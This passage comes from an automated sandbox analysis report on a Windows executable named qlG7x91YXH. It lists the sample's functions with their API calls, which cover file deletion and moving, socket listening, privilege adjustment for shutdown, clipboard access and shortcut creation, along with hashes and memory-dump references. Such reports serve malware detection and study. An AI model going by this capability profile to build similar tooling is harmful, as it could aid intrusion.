                                              • Instruction Fuzzy Hash: 6A61E3352042419FD310EF26DC95F2AB7A4EF84704F28461DF49A972A2DB72DD49CBB2
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • DragQueryPoint.SHELL32(?,?), ref: 00E09147
                                                • Part of subcall function 00E07674: ClientToScreen.USER32(?,?), ref: 00E0769A
                                                • Part of subcall function 00E07674: GetWindowRect.USER32(?,?), ref: 00E07710
                                                • Part of subcall function 00E07674: PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E091B0
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E091BB
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E091DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E09225
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E0923E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09255
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09277
                                              • DragFinish.SHELL32(?), ref: 00E0927E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E09371
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                              • API String ID: 4085959399-136824727
                                              • Opcode ID: 1f4fe656bec7ad0bea85a9672c53d0001480a119f219cde00d69cb4f13fbb804
                                              • Instruction ID: c6f737c6a122bd406831a3d2ea7ab4abc7ae6b29473d8dabdfee72c8b1cef335
                                              • Opcode Fuzzy Hash: 1f4fe656bec7ad0bea85a9672c53d0001480a119f219cde00d69cb4f13fbb804
                                              • Instruction Fuzzy Hash: 43617971108301AFC701DF65DC85DAFBBE8EFC9750F104A1DF595A21A1EB319A89CB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE69BE
                                              • FindClose.KERNEL32(00000000), ref: 00DE6A12
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A4E
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A75
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6AB2
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6ADF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                              • API String ID: 3830820486-3289030164
                                              • Opcode ID: 6604323858490ec49bd080eb87209c180bfb8c9c0b39920aec5bfefe2a02a536
                                              • Instruction ID: 33607c4b15885bd3d0b1b995b1fd55c480d7b727312ed325a4f9b7aaab588d8a
                                              • Opcode Fuzzy Hash: 6604323858490ec49bd080eb87209c180bfb8c9c0b39920aec5bfefe2a02a536
                                              • Instruction Fuzzy Hash: F4D14F72508340AEC710EBA5C896EABB7ECEF98704F04891DF589D6191FB74DA44CB72
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE9663
                                              • GetFileAttributesW.KERNEL32(?), ref: 00DE96A1
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00DE96BB
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE96D3
                                              • FindClose.KERNEL32(00000000), ref: 00DE96DE
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE96FA
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE974A
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE9768
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9772
                                              • FindClose.KERNEL32(00000000), ref: 00DE977F
                                              • FindClose.KERNEL32(00000000), ref: 00DE978F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1409584000-438819550
                                              • Opcode ID: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction ID: 33d9c1f52789d8f3b990dbe8a7f233286d250fda054633067d536e50f04582ad
                                              • Opcode Fuzzy Hash: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction Fuzzy Hash: 7A31D2325026596EDF10BFB6EC58ADEB7AC9F09321F244166F804F20A1DB31D988CA34
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE97BE
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE9819
                                              • FindClose.KERNEL32(00000000), ref: 00DE9824
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9840
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9890
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE98AE
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE98B8
                                              • FindClose.KERNEL32(00000000), ref: 00DE98C5
                                              • FindClose.KERNEL32(00000000), ref: 00DE98D5
                                                • Part of subcall function 00DDDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DDDB00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 2640511053-438819550
                                              • Opcode ID: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction ID: 2097a5405863b4064775b349adee254c4454e328fe07e6868b2ded8d0ca26237
                                              • Opcode Fuzzy Hash: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction Fuzzy Hash: 5231C2315016596EDF10BFB6EC98ADEB7ACDF06320F244166E810B21E0DB31D989CA74
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00DE8257
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE8267
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE8273
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE8310
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8324
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8356
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE838C
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local$System
                                              • String ID: *.*
                                              • API String ID: 1464919966-438819550
                                              • Opcode ID: 92c32564c68ca557d22af5dc7db2b26ec62449698f13f0b19c0ad89a42d6b3ec
                                              • Instruction ID: 3c313774d58bc1320b70f2884161a38b3c90e0656775c62bc98532e138021b3d
                                              • Opcode Fuzzy Hash: 92c32564c68ca557d22af5dc7db2b26ec62449698f13f0b19c0ad89a42d6b3ec
                                              • Instruction Fuzzy Hash: CE6155725083459FCB10EF65C8419AEB3E8FF89314F04891EE999D7251EB31E949CBA2
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD122
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DDD1DD
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDD1F0
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD20D
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD237
                                                • Part of subcall function 00DDD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DDD21C,?,?), ref: 00DDD2B2
                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00DDD253
                                              • FindClose.KERNEL32(00000000), ref: 00DDD264
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 1946585618-1173974218
                                              • Opcode ID: 20c1e97cffe62f4775b89b37e8fd0ebe203d5c662222e91fdd2b47c320d2b1f1
                                              • Instruction ID: 3c78ce42b50ebe1da178e2c4f7e1721f9100c74ab212ab45fc85eb5f7c4c4699
                                              • Opcode Fuzzy Hash: 20c1e97cffe62f4775b89b37e8fd0ebe203d5c662222e91fdd2b47c320d2b1f1
                                              • Instruction Fuzzy Hash: B9614B3180121DAECF05EBE0D9929EDBB76EF55300F248166E40677292EB31AF09DB71
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: cf79677a0a00be85b691110158f64c2bd95bc8b987896027d28271fe6093b34b
                                              • Instruction ID: b1c1d117a8f5bf4d73e2c9af947963b89748ee95fccfa46274a0c1e22dc04ed0
                                              • Opcode Fuzzy Hash: cf79677a0a00be85b691110158f64c2bd95bc8b987896027d28271fe6093b34b
                                              • Instruction Fuzzy Hash: CD41EF34604651AFD720EF16E888F19BBE0EF44718F18C199E4599B662C732EC86CBA0
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00DDE932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $ $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-3163812486
                                              • Opcode ID: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
                                              • Instruction ID: 78915c3da431b9268667ca5fc60f145fb4ca2b775c3684e87e1272bf05ded46f
                                              • Opcode Fuzzy Hash: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
                                              • Instruction Fuzzy Hash: E0012672611211BFEB1433B59C9AFBF735CD714740F280923F802F62D2D5A19C8489B0
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00DF1276
                                              • WSAGetLastError.WS2_32 ref: 00DF1283
                                              • bind.WS2_32(00000000,?,00000010), ref: 00DF12BA
                                              • WSAGetLastError.WS2_32 ref: 00DF12C5
                                              • closesocket.WS2_32(00000000), ref: 00DF12F4
                                              • listen.WS2_32(00000000,00000005), ref: 00DF1303
                                              • WSAGetLastError.WS2_32 ref: 00DF130D
                                              • closesocket.WS2_32(00000000), ref: 00DF133C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                              • String ID:
                                              • API String ID: 540024437-0
                                              • Opcode ID: 443913ddb9d944094aaaa70785934bf873d3182cbcde14efb0402bc2c319024f
                                              • Instruction ID: dd257c6fc231feef2c7d69ee4f2ed5ed892f38a561bb8c489fb7035b40f98e85
                                              • Opcode Fuzzy Hash: 443913ddb9d944094aaaa70785934bf873d3182cbcde14efb0402bc2c319024f
                                              • Instruction Fuzzy Hash: 3941AE35A00144DFD714DF64C489B2ABBE5EF86318F29C188E95A9F292C771ED85CBB0
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD420
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD470
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD481
                                              • FindClose.KERNEL32(00000000), ref: 00DDD498
                                              • FindClose.KERNEL32(00000000), ref: 00DDD4A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: f25cf71f04fa89985bbe8317a103b84682e8f2796c04904499dc617f1212caf2
                                              • Instruction ID: 06c243f30ca9ab9932befa88c189a90a88dee0411b7790178e4a943b8ae6ca1a
                                              • Opcode Fuzzy Hash: f25cf71f04fa89985bbe8317a103b84682e8f2796c04904499dc617f1212caf2
                                              • Instruction Fuzzy Hash: 713170310083459FC714EF64D8528AFB7A8EE95304F548A1EF4D5522A1EB31EA09CB73
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction ID: 71e80d074427870e7bbcbfb5ea9def6ec1caed80cadc7046ec7fb52ccef3e7c5
                                              • Opcode Fuzzy Hash: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction Fuzzy Hash: 46C22A71E046288FDB25CF68DD407EAB7B5EB4A305F1845EAD44DE7240E778AE818F60
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE64DC
                                              • CoInitialize.OLE32(00000000), ref: 00DE6639
                                              • CoCreateInstance.COMBASE(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE6650
                                              • CoUninitialize.COMBASE ref: 00DE68D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 886957087-24824748
                                              • Opcode ID: 8955cde039f35d13f3bc6d5bb84ab49277e888dca673ca6d0f6f408f2fc76131
                                              • Instruction ID: 7eef3dac980da1f2715c0de64a80353a0b90f7bc75321a3cf6f3bd3e67feec20
                                              • Opcode Fuzzy Hash: 8955cde039f35d13f3bc6d5bb84ab49277e888dca673ca6d0f6f408f2fc76131
                                              • Instruction Fuzzy Hash: 7CD13871608241AFC314EF24C891D6BB7E8FF94344F14896DF5998B2A1EB30E945CBB2
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00DF22E8
                                                • Part of subcall function 00DEE4EC: GetWindowRect.USER32(?,?), ref: 00DEE504
                                              • GetDesktopWindow.USER32 ref: 00DF2312
                                              • GetWindowRect.USER32(00000000), ref: 00DF2319
                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DF2355
                                              • GetCursorPos.USER32(?), ref: 00DF2381
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DF23DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                              • String ID:
                                              • API String ID: 2387181109-0
                                              • Opcode ID: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction ID: bfbfe41e3295681e7e1f2ddc060ad4b79247722ce244bd0c7b14b2be60fba547
                                              • Opcode Fuzzy Hash: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction Fuzzy Hash: 1F31EFB2105319AFC720DF15D844E6BBBE9FF84314F104A1EF984A7181DB35E948CBA2
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DE9B78
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE9C8B
                                                • Part of subcall function 00DE3874: GetInputState.USER32 ref: 00DE38CB
                                                • Part of subcall function 00DE3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE9BA8
                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE9C75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
